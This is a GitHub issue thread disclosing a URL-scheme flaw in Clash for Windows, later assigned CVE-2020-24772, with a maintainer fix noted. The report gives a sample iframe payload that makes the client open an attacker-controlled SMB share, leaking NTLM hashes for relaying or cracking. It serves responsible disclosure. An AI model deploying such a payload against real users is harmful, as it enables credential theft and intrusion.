Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[Clash for Windows] URL Scheme security issue #910

Closed
burpheart opened this issue Aug 20, 2020 · 6 comments
Closed

[Clash for Windows] URL Scheme security issue #910

burpheart opened this issue Aug 20, 2020 · 6 comments
Labels
not related Not related to this project

Comments

@burpheart
Copy link

Environment

OS: windows

说明 Description

The vulnerability is similar to the TeamViewer CVE-2020-13699 vulnerability.
Attacker could embed a malicious iframe in a website with a crafted URL
(<iframe src='clash://install-config?url=\\attacker\2131'></iframe>)
that would launch the Clash Windows client and force it to
open a remote SMB share. Windows will perform NTLM authentication when
opening the SMB share and that request can be relayed (using a tool like
responder) for code execution (or captured for hash cracking).

可能的解决方案 Possible Solution

Limit http or https to get configuration files

更多信息

该漏洞与TeamViewer的CVE-2020-13699漏洞 类似 https://cert.360.cn/warning/detail?id=d31cb7d9342a5ab0973ab2e5e28ddd84
攻击者可以利用精心构造的iframe 拉起Clash应用程序 例如 (<iframe src='clash://install-config?url=\\attacker\2131'></iframe>)
并访问指定SMB服务器
当Clash 访问攻击者构造SMB的服务器获取配置文件时
Windows会进行NTLM认证 发送NTLM哈希到攻击者的服务器
攻击者可以利用NTLM哈希进行用户密码破解等操作
该漏洞有一定的危害性

@Dreamacro Dreamacro added the not related Not related to this project label Aug 20, 2020
@Dreamacro
Copy link
Owner

@Fndroid

@Dreamacro Dreamacro changed the title [Bug]URL Scheme security issue [Clash for Windows] URL Scheme security issue Aug 20, 2020
@Fndroid
Copy link
Contributor

Fndroid commented Aug 20, 2020

@burpheart HTTP protocol limit will be added in the next release. Thank you for the report.

@Dreamacro
Copy link
Owner

Clash for Windows fixed it

@burpheart
Copy link
Author

burpheart commented Mar 16, 2022

affected Product: clash for windows
affected version: v 0.11.4
fixed version: v 0.11.5
CVDID: CVE-2020-24772
Impact:Attacker could embed a malicious iframe in a website with a crafted URL that would launch the Clash Windows client and force it to open a remote SMB share.Windows will perform NTLM authentication when
opening the SMB share and that request can be relayed.
reference: #910
description:Attacker could embed a malicious iframe in a website with
a crafted URL that would launch the Clash Windows client and force it to
open a remote SMB share. Windows will perform NTLM
authentication when opening the SMB share and that request
can be relayed (using a tool like responder) for code
execution (or captured for hash cracking).

@kamikredstone
Copy link

Hey @burpheart and @Dreamacro !
I noticed that both the version the PoC is conducted on and the fixed version doesn't correspond to the tags in this repository.
Is there some other versioning used?

@burpheart
Copy link
Author

Hey @burpheart and @Dreamacro ! I noticed that both the version the PoC is conducted on and the fixed version doesn't correspond to the tags in this repository. Is there some other versioning used?
@kamikredstone
https://github.com/Fndroid/clash_for_windows_pkg/releases/tag/0.11.4

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
not related Not related to this project
Projects
None yet
Development

No branches or pull requests

4 participants